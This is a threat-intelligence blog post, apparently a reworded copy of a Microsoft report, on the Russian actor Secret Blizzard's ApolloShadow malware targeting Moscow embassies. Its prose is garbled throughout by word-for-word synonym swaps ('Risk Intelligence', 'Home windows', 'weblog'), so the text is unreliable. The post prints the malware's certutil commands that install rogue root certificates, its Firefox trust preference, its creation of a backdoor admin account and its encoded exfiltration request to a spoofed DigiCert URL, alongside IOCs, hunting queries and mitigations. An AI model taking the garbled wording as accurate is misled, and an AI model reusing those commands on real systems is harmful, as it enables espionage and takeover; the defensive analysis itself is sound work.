Microsoft Risk Intelligence has uncovered a cyberespionage marketing campaign by the Russian state actor we observe as Secret Blizzard that has been focusing on embassies situated in Moscow utilizing an adversary-in-the-middle (AiTM) place to deploy their customized ApolloShadow malware. ApolloShadow has the aptitude to put in a trusted root certificates to trick gadgets into trusting malicious actor-controlled websites, enabling Secret Blizzard to keep up persistence on diplomatic gadgets, possible for intelligence assortment. This marketing campaign, which has been ongoing since a minimum of 2024, poses a excessive threat to overseas embassies, diplomatic entities, and different delicate organizations working in Moscow, significantly to these entities who depend on native web suppliers.
Whereas we beforehand assessed with low confidence that the actor conducts cyberespionage actions inside Russian borders in opposition to overseas and home entities, that is the primary time we will verify that they’ve the aptitude to take action on the Web Service Supplier (ISP) degree. Which means that diplomatic personnel utilizing native ISP or telecommunications companies in Russia are extremely possible targets of Secret Blizzard’s AiTM place inside these companies. In our earlier weblog, we reported the actor possible leverages Russia’s home intercept programs such because the System for Operative Investigative Actions (SORM), which we assess could also be integral in facilitating the actor’s present AiTM exercise, judging from the large-scale nature of those operations.
This weblog offers steering on how organizations can defend in opposition to Secret Blizzard’s AiTM ApolloShadow marketing campaign, together with forcing or routing all site visitors by an encrypted tunnel to a trusted community or utilizing an alternate supplier—corresponding to a satellite-based connection—hosted inside a rustic that doesn’t management or affect the supplier’s infrastructure. The weblog additionally offers extra data on community protection, corresponding to suggestions, indicators of compromise (IOCs), and detection particulars.
Secret Blizzard is attributed by the USA Cybersecurity and Infrastructure Company (CISA) as Russian Federal Safety Service (Heart 16). Secret Blizzard additional overlaps with risk actors tracked by different safety distributors by names corresponding to VENOMOUS BEAR, Uroburos, Snake, Blue Python, Turla, Wraith, ATG26, and Waterbug.
As a part of our steady monitoring, evaluation, and reporting of the risk panorama, we’re sharing our observations on Secret Blizzard’s newest exercise to boost consciousness of this actor’s tradecraft and educate organizations on the best way to harden their assault floor in opposition to this and comparable exercise. Though this exercise poses a excessive threat to entities inside Russia, the protection measures included on this weblog are broadly relevant and might help organizations in any area cut back their threat from comparable threats. Microsoft can also be monitoring different teams utilizing comparable strategies, together with these documented by ESET in a earlier publication.
AiTM and ApolloShadow deployment
In February 2025, Microsoft Risk Intelligence noticed Secret Blizzard conducting a cyberespionage marketing campaign in opposition to overseas embassies situated in Moscow, Russia, utilizing an AiTM place to deploy the ApolloShadow malware to keep up persistence and gather intelligence from diplomatic entities. An adversary-in-the-middle approach is when an adversary positions themself between two or extra networks to help follow-on exercise. The Secret Blizzard AiTM place is probably going facilitated by lawful intercept and notably consists of the set up of root certificates below the guise of Kaspersky Anti-Virus (AV). We assess this permits for TLS/SSL stripping from the Secret Blizzard AiTM place, rendering nearly all of the goal’s searching in clear textual content together with the supply of sure tokens and credentials. Secret Blizzard has exhibited comparable strategies in previous cyberespionage campaigns to contaminate overseas ministries in Japanese Europe by tricking customers to obtain a trojanized Flash installer from an AiTM place.
Preliminary entry
On this most up-to-date marketing campaign, the preliminary entry mechanism utilized by Secret Blizzard is facilitated by an AiTM place on the ISP/Telco degree inside Russia, by which the actor redirects goal gadgets by placing them behind a captive portal. Captive portals are authentic internet pages designed to handle community entry, corresponding to these encountered when connecting to the web at a lodge or airport. As soon as behind a captive portal, the Home windows Check Connectivity Standing Indicator is initiated—a authentic service that determines whether or not a tool has web entry by sending an HTTP GET request to hxxp://www.msftconnecttest[.]com/redirect which ought to direct to msn[.]com.
Supply and set up
As soon as the system opens the browser window to this tackle, the system is redirected to a separate actor-controlled area that possible shows a certificates validation error which prompts the goal to obtain and execute ApolloShadow. Following execution, ApolloShadow checks for the privilege degree of the ProcessToken and if the machine just isn’t operating on default administrative settings, then the malware shows the person entry management (UAC) pop-up window to immediate the person to put in certificates with the file title CertificateDB.exe, which masquerades as a Kaspersky installer to put in root certificates and permit the actor to achieve elevated privileges within the system.
ApolloShadow malware
ApolloShadow makes use of two execution paths relying on the privilege degree of the operating course of. The token of the operating course of is retrieved utilizing the API GetTokenInformationType and the worth of TokenInformation is checked to see if the token accommodates the TokenElevationTypeFullkind. If it doesn’t have that privilege degree, ApolloShadow executes a low privilege execution path.
Low privilege execution
When executing the low privilege path, the primary motion is to gather details about the host to ship again to the AiTM managed command and management (C2). First, the host’s IP data is collected utilizing the API GetIpAddrTable, which collects data from the IpAddrTable. Every entry is individually Base64-encoded and delineated by a pipe character with rn appended, then mixed into one string. For instance:
- 172.29.162[.]128 00-15-5D-04-04-1C
- 127.0.0[.]1
"|MTcyLjI5LjE2Mi4xMjggMDAtMTUtNUQtMDQtMDQtMUM=|rn|MTI3LjAuMC4xIA==|rn"
Then all the string is Base64-encoded as soon as once more in preparation for exfiltration to the C2 host:
"fE1UY3lMakk1TGpFMk1pNHhNamdnTURBdE1UVXROVVF0TURRdE1EUXRNVU09fA0KfE1USTNMakF1TUM0eElBPT18DQo="
The encoded community data is added as a question string to a GET request with the vacation spot URL hxxp://timestamp.digicert[.]com/registered. Two question parameters are included with the request, code and t. The Code parameters accommodates a hardcoded set of characters and the t variable has the encoded IP tackle data, as proven beneath:
code=DQBBBBBBBBBOBBBBBBBBBBgBBBBBBBBBny_t???????t=fE1UY3lMakk1TGpFMk1pNHhNamdnTURBdE1UVXROVVF0TURRdE1EUXRNVU09fA0KfE1USTNMakF1TUM0eElBPT18DQo=
Whereas the timestamp subdomain does exist for Digicert, the /registered useful resource doesn’t. Because of the AiTM place of the actor, Secret Blizzard can use DNS manipulation to redirect legitimate-looking communication to the actor-controlled C2 and return an encoded VBScript because the second-stage payload.
When the response comes again from the redirected Digicert request, the file title that’s used to write down the script to disk is decoded to be used. ApolloShadow makes use of string obfuscation in a number of locations all through the binary to cover vital strings. These strings are blocks of encoded characters which might be encoded utilizing XOR with a separate set of hardcoded constants. Whereas this isn’t a very subtle approach, it is sufficient to obscure the strings from view at first look. The strings are decoded as they’re used after which re-encoded after use to take away traces of the strings from reminiscence.
The decoded file title is edgB4ACD.vbs and the file title string is concatenated by the malware with the outcomes of querying the atmosphere variable for the TEMP listing to create the trail for the goal script. We had been unable to recuperate the script, however the header of the response is checked for the primary 12 characters to see if it matches the string MDERPWSAB64B. As soon as ApolloShadow has correctly decoded the script, it executes the script utilizing the Home windows API name CreateProcessW with the command line to launch wscript and the trail to edgB4ACD.vbs.
Lastly, the ApolloShadow course of launches itself once more utilizing ShellExecuteA, which presents the person with an UAC window to bypass UAC mechanisms and immediate the person to grant the malware the very best privileges accessible to the person.
Elevated privilege execution
When the method is executed with enough elevated privileges, ApolloShadow alters the host by setting all networks to Personal. This induces a number of modifications together with permitting the host machine to change into discoverable, and stress-free firewall guidelines to allow file sharing. Whereas we didn’t see any direct makes an attempt for lateral motion, the principle purpose for these modifications is more likely to cut back the issue of lateral motion on the community. ApolloShadow makes use of two totally different strategies to carry out this alteration.
The primary technique is thru the registry settings for NetworkProfiles: SOFTWAREMicrosoftHome windows NTCurrentVersionNetworkListProfiles. The community’s globally distinctive identifiers (GUIDs) are parsed for every linked community, and the malware modifies the worth Class by setting it to 0. This variation units the profile of the community to Personal after the host has been rebooted.
The second technique immediately units firewall guidelines utilizing Part Object Mannequin (COM) objects that allow file sharing and activate community discovery. A number of strings are decoded utilizing the identical technique as above and concatenated to create the firewall guidelines they need to modify.
FirewallAPI.dll,-32752- This command allows the Community Discovery rule group
FirewallAPI.dll,-28502- This command allows all guidelines within the File and Printer Sharing group
The strings are handed to the COM objects to allow the foundations if they don’t seem to be already enabled.
Each strategies have some crossover, however the next desk offers a comparability overview of every technique.
| Method | Objective | Timing | Stealth | Impact |
| Registry profile change | Units community to Personal | Requires reboot | Excessive | Broadly relaxes firewall posture |
| COM-based rule enablement | Prompts particular guidelines | Rapid | Average | Opens exact ports for discovery and sharing |
From right here, ApolloShadow presents the person with a window exhibiting that the certificates are being put in.
A brand new thread performs the rest of the performance. The 2 root certificates being put in are written to the %TEMP% listing with a short lived title and the extension crt. The certificates set up is carried out through the use of the Home windows certutil utility and the non permanent recordsdata are deleted following the execution of the instructions.
certutil.exe -f -Enterprise -addstore root "C:CustomersAppDataLocalTempcrt3C5C.tmp" certutil.exe -f -Enterprise -addstore ca "C:CustomersAppDataLocalTempcrt53FF.tmp"
The malware should add a desire file to the Firefox desire listing as a result of Firefox makes use of totally different certificates shops than browsers corresponding to Chromium, which ends up in Firefox not trusting the foundation and enterprise retailer by default. ApolloShadow reads the registry key that factors to the set up of the applying and builds a path to the desire listing from there. A file is written to disk referred to as wincert.js containing a desire modification for Firefox browsers, permitting Firefox to belief the foundation certificates added to the working system’s certificates retailer.
pref("safety.enterprise_roots.enabled", true);" privilege
The ultimate step is to create an administrative person with the username UpdatusUser and a hardcoded password on the contaminated system utilizing the Home windows API NetUserAdd. The password can also be set to by no means expire.
ApolloShadow has efficiently put in itself on the contaminated host and has persistent entry utilizing the brand new native administrator person.
Defending in opposition to Secret Blizzard exercise
Microsoft recommends that each one prospects, however particularly delicate organizations working in Moscow, ought to implement the next suggestions to mitigate in opposition to Secret Blizzard exercise.
- Route all site visitors by an encrypted tunnel to a trusted community or use a digital non-public community (VPN) service supplier, corresponding to a satellite-based supplier, whose infrastructure just isn’t managed or influenced by outdoors events.
Microsoft additionally recommends the next steering to reinforce safety and mitigate potential threats:
- Follow the precept of least privilege, use multifactor authentication (MFA), and audit privileged account exercise in your environments to sluggish and cease attackers. Keep away from the usage of domain-wide, admin-level service accounts and limit native administrative privileges. These mitigation steps cut back the paths that attackers have accessible to them to perform their objectives and decrease the danger of the compromise spreading in your atmosphere.
- Often assessment extremely privileged teams like Directors, Distant Desktop Customers, and Enterprise Admins. Risk actors might add accounts to those teams to keep up persistence and disguise their exercise.
- Activate cloud-delivered safety in Microsoft Defender Antivirus or the equal on your antivirus product to cowl quickly evolving attacker instruments and strategies.
- Run endpoint detection and response (EDR) in block mode, in order that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the risk or when Microsoft Defender Antivirus is operating in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
- Activate assault floor discount guidelines to stop widespread assault strategies. These guidelines, which may be configured by all Microsoft Defender Antivirus prospects and never simply these utilizing the EDR resolution, supply important hardening in opposition to widespread assault vectors.
- Block executable recordsdata from operating except they meet a prevalence, age, or trusted checklist criterion
- Block execution of doubtless obfuscated scripts
Microsoft Defender XDR detections
Microsoft Defender XDR prospects can confer with the checklist of relevant detections beneath. Microsoft Defender XDR coordinates detection, prevention, investigation, and response throughout endpoints, identities, electronic mail, apps to offer built-in safety in opposition to assaults just like the risk mentioned on this weblog.
Clients with provisioned entry may also use Microsoft Safety Copilot in Microsoft Defender to research and reply to incidents, hunt for threats, and defend their group with related risk intelligence.
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects this risk as the next malware:
Microsoft Defender for Endpoint
The next alerts may point out risk exercise associated to this risk. Notice, nevertheless, that these alerts may be additionally triggered by unrelated risk exercise.
- Secret Blizzard Actor exercise detected
- Suspicious root certificates set up
- Suspicious certutil exercise
- Consumer account created below suspicious circumstances
- A script with suspicious content material was noticed
Microsoft Safety Copilot
Safety Copilot prospects can use the standalone expertise to create their very own prompts or run the next pre-built promptbooks to automate incident response or investigation duties associated to this risk:
- Incident investigation
- Microsoft Consumer evaluation
- Risk actor profile
- Risk Intelligence 360 report based mostly on MDTI article
- Vulnerability impression evaluation
Notice that some promptbooks require entry to plugins for Microsoft merchandise corresponding to Microsoft Defender XDR or Microsoft Sentinel.
Risk intelligence reviews
Microsoft prospects can use the next reviews in Microsoft merchandise to get probably the most up-to-date details about the risk actor, malicious exercise, and strategies mentioned on this weblog. These reviews present the intelligence, safety data, and advisable actions to stop, mitigate, or reply to related threats present in buyer environments.
Microsoft Defender Risk Intelligence
Microsoft Safety Copilot prospects may also use the Microsoft Safety Copilot integration in Microsoft Defender Risk Intelligence, both within the Safety Copilot standalone portal or within the embedded expertise within the Microsoft Defender portal to get extra details about this risk actor.
Looking queries
Microsoft Defender XDR
Microsoft Defender XDR prospects can run the next question to search out associated exercise of their networks:
Floor gadgets that try and obtain a file inside two minutes after captive portal redirection. This exercise might point out a primary stage AiTM assault—such because the one utilized by Secret Blizzard—in opposition to a tool.
let CaptiveRedirectEvents = DeviceNetworkEvents | the place RemoteUrl accommodates "msftconnecttest.com/redirect" | undertaking DeviceId, RedirectTimestamp = Timestamp, RemoteUrl; let FileDownloadEvents = DeviceFileEvents | the place ActionType == "FileDownloaded" | undertaking DeviceId, DownloadTimestamp = Timestamp, FileName, FolderPath; CaptiveRedirectEvents | be a part of sort=internal (FileDownloadEvents) on DeviceId | the place DownloadTimestamp between (RedirectTimestamp .. (RedirectTimestamp + 2m)) | undertaking DeviceId, RedirectTimestamp, RemoteUrl, DownloadTimestamp, FileName, FolderPath Microsoft Sentinel
Microsoft Sentinel prospects can use the TI Mapping analytics (a sequence of analytics all prefixed with ‘TI map’) to routinely match the malicious area indicators talked about on this weblog submit with information of their workspace. If the TI Map analytics aren’t presently deployed, prospects can set up the Risk Intelligence resolution from the Microsoft Sentinel Content material Hub to have the analytics rule deployed of their Sentinel workspace.
Beneath are the queries utilizing Sentinel Superior Safety Data Mannequin (ASIM) features to hunt threats throughout each Microsoft first occasion and third-party information sources. ASIM additionally helps deploying parsers to particular workspaces from GitHub, utilizing an ARM template or manually.
Detect community IP and area indicators of compromise utilizing ASIM
The beneath question checks IP addresses and area indicators of compromise (IOCs) throughout information sources supported by ASIM Community session parser.
//IP checklist and area list- _Im_NetworkSession let lookback = 30d; let ioc_ip_addr = dynamic(["45.61.149.109"]); let ioc_domains = dynamic(["kav-certificates.info"]); _Im_NetworkSession(starttime=todatetime(in the past(lookback)), endtime=now()) | the place DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains) | summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated), EventCount=rely() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor Detect community and recordsdata hashes indicators of compromise utilizing ASIM
The beneath queries will test IP addresses and file hash IOCs throughout information sources supported by ASIM Internet session parser.
Detect community indicators of compromise and domains utilizing ASIM
//IP checklist - _Im_WebSession let lookback = 30d; let ioc_ip_addr = dynamic(["45.61.149.109"]); let ioc_sha_hashes =dynamic(["13fafb1ae2d5de024e68f2e2fc820bc79ef0690c40dbfd70246bcc394c52ea20"]); _Im_WebSession(starttime=todatetime(in the past(lookback)), endtime=now()) | the place DstIpAddr in (ioc_ip_addr) or FileSHA256 in (ioc_sha_hashes) | summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated), EventCount=rely() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor // Area checklist - _Im_WebSession let ioc_domains = dynamic(["kav-certificates.info"]); _Im_WebSession (url_has_any = ioc_domains) Detect recordsdata hashes indicators of compromise utilizing ASIM
The beneath question will test IP addresses and file hash IOCs throughout information sources supported by ASIM FileEvent parser.
Detect community and recordsdata hashes indicators of compromise utilizing ASIM
// file hash checklist - imFileEvent let ioc_sha_hashes =dynamic(["13fafb1ae2d5de024e68f2e2fc820bc79ef0690c40dbfd70246bcc394c52ea20"]); imFileEvent | the place SrcFileSHA256 in (ioc_sha_hashes) or TargetFileSHA256 in (ioc_sha_hashes) | prolong AccountName = tostring(break up(Consumer, @'')[1]), AccountNTDomain = tostring(break up(Consumer, @'')[0]) | prolong AlgorithmType = "SHA256" Indicators of compromise
| Indicator | Kind | Description |
| kav-certificates[.]data | Area | Actor-controlled area that downloads the malware |
| 45.61.149[.]109 | IP tackle | Actor-controlled IP tackle |
| 13fafb1ae2d5de024e68f2e2fc820bc79ef0690c40dbfd70246bcc394c52ea20 | SHA256 | ApolloShadow malware |
| CertificateDB.exe | File title | File title related to ApolloShadow pattern |
References
Acknowledgments
Be taught extra
Meet the consultants behind Microsoft Risk Intelligence, Incident Response, and the Microsoft Safety Response Heart at our VIP Mixer at Black Hat 2025. Uncover how our end-to-end platform might help you strengthen resilience and elevate your safety posture.
For the most recent safety analysis from the Microsoft Risk Intelligence group, take a look at the Microsoft Risk Intelligence Weblog.
To get notified about new publications and to affix discussions on social media, comply with us on LinkedIn, X (previously Twitter), and Bluesky.
To listen to tales and insights from the Microsoft Risk Intelligence group in regards to the ever-evolving risk panorama, take heed to the Microsoft Risk Intelligence podcast.
